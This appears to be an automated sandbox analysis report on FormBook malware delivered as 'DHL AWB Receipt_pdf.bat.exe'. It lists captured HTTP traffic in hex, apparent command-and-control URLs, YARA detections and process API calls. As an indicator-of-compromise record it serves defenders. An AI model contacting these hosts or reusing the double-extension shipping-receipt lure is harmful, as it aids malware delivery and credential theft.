20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Mar 2025 07:47:54 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Mar 2025 07:47:56 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Mar 2025 07:47:59 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
                Source: DHL AWB Receipt_pdf.bat.exe, oSJLRdDbLeQ.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: DHL AWB Receipt_pdf.bat.exe, oSJLRdDbLeQ.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: DHL AWB Receipt_pdf.bat.exe, oSJLRdDbLeQ.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                Source: EhStorAuthn.exe, 00000012.00000002.4688612074.0000000005796000.00000004.10000000.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000002.4688182226.0000000002F76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://primepath.net/esw3/?-n=STIHOi9CYFClakjV40da904kxu04fSTg15TVg9rRTe6RIWG0ngBkAmIpkbb4lCp8vZ5PbV
                Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.2318069311.00000000023DC000.00000004.00000800.00020000.00000000.sdmp, oSJLRdDbLeQ.exe, 0000000B.00000002.2438281120.000000000320C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: ctd5Fl0jEEYLVK.exe, 00000014.00000002.4689681317.0000000004EBD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.rbopisalive.cyou
                Source: ctd5Fl0jEEYLVK.exe, 00000014.00000002.4689681317.0000000004EBD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.rbopisalive.cyou/2dxw/
                Source: EhStorAuthn.exe, 00000012.00000003.2675135952.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: EhStorAuthn.exe, 00000012.00000003.2675135952.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: EhStorAuthn.exe, 00000012.00000002.4688612074.0000000006102000.00000004.10000000.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000002.4688182226.00000000038E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: EhStorAuthn.exe, 00000012.00000003.2675135952.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: EhStorAuthn.exe, 00000012.00000003.2675135952.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: EhStorAuthn.exe, 00000012.00000003.2675135952.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: EhStorAuthn.exe, 00000012.00000003.2675135952.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: EhStorAuthn.exe, 00000012.00000003.2675135952.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: EhStorAuthn.exe, 00000012.00000002.4688612074.0000000005ABA000.00000004.10000000.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000002.4688182226.000000000329A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://error.skycloud.tw/system/error?code=400
                Source: EhStorAuthn.exe, 00000012.00000002.4686720826.0000000002D16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: EhStorAuthn.exe, 00000012.00000002.4686720826.0000000002D16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: EhStorAuthn.exe, 00000012.00000002.4686720826.0000000002D16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: EhStorAuthn.exe, 00000012.00000002.4686720826.0000000002D16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: EhStorAuthn.exe, 00000012.00000002.4686720826.0000000002D16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: EhStorAuthn.exe, 00000012.00000002.4686720826.0000000002D16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: EhStorAuthn.exe, 00000012.00000003.2669451776.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: DHL AWB Receipt_pdf.bat.exe, oSJLRdDbLeQ.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: EhStorAuthn.exe, 00000012.00000003.2675135952.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: EhStorAuthn.exe, 00000012.00000003.2675135952.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000012.00000002.4686556530.0000000000990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4687868564.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4687804646.0000000004880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2485690943.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2480555457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4688006537.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2481904165.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: DHL AWB Receipt_pdf.bat.exe
                Source: initial sampleStatic PE information: Filename: DHL AWB Receipt_pdf.bat.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0042C763 NtClose,10_2_0042C763
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012B60 NtClose,LdrInitializeThunk,10_2_01012B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_01012DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_01012C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010135C0 NtCreateMutant,LdrInitializeThunk,10_2_010135C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01014340 NtSetContextThread,10_2_01014340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01014650 NtSuspendThread,10_2_01014650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012B80 NtQueryInformationFile,10_2_01012B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012BA0 NtEnumerateValueKey,10_2_01012BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012BE0 NtQueryValueKey,10_2_01012BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012BF0 NtAllocateVirtualMemory,10_2_01012BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012AB0 NtWaitForSingleObject,10_2_01012AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012AD0 NtReadFile,10_2_01012AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012AF0 NtWriteFile,10_2_01012AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012D00 NtSetInformationFile,10_2_01012D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012D10 NtMapViewOfSection,10_2_01012D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012D30 NtUnmapViewOfSection,10_2_01012D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012DB0 NtEnumerateKey,10_2_01012DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012DD0 NtDelayExecution,10_2_01012DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012C00 NtQueryInformationProcess,10_2_01012C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012C60 NtCreateKey,10_2_01012C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012CA0 NtQueryInformationToken,10_2_01012CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012CC0 NtQueryVirtualMemory,10_2_01012CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012CF0 NtOpenProcess,10_2_01012CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012F30 NtCreateSection,10_2_01012F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012F60 NtCreateProcessEx,10_2_01012F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012F90 NtProtectVirtualMemory,10_2_01012F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012FA0 NtQuerySection,10_2_01012FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012FB0 NtResumeThread,10_2_01012FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012FE0 NtCreateFile,10_2_01012FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012E30 NtWriteVirtualMemory,10_2_01012E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012E80 NtReadVirtualMemory,10_2_01012E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012EA0 NtAdjustPrivilegesToken,10_2_01012EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01012EE0 NtQueueApcThread,10_2_01012EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01013010 NtOpenDirectoryObject,10_2_01013010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01013090 NtSetValueKey,10_2_01013090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_010139B0 NtGetContextThread,10_2_010139B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01013D10 NtOpenProcessToken,10_2_01013D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01013D70 NtOpenThread,10_2_01013D70
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeCode function: 0_2_021D5CA00_2_021D5CA0
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeCode function: 0_2_021D70080_2_021D7008
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeCode function: 0_2_021DDFA40_2_021DDFA4
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeCode function: 0_2_06A752EC0_2_06A752EC
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeCode function: 0_2_06A7C9D00_2_06A7C9D0
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeCode function: 0_2_06A752E30_2_06A752E3
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeCode function: 0_2_06A770B00_2_06A770B0
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeCode function: 0_2_06A7EA880_2_06A7EA88
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeCode function: 0_2_06A7EA770_2_06A7EA77
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeCode function: 0_2_06B557380_2_06B55738
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeCode function: 0_2_06B548F00_2_06B548F0
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeCode function: 0_2_070C00400_2_070C0040
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeCode function: 0_2_070CED580_2_070CED58
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeCode function: 0_2_070CF5C80_2_070CF5C8
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeCode function: 0_2_070CF1900_2_070CF190
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeCode function: 0_2_070CFA000_2_070CFA00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0041882310_2_00418823
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0041009A10_2_0041009A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004100A310_2_004100A3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00416A1E10_2_00416A1E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00416A2310_2_00416A23
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004102C310_2_004102C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040E29910_2_0040E299
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040E2A310_2_0040E2A3
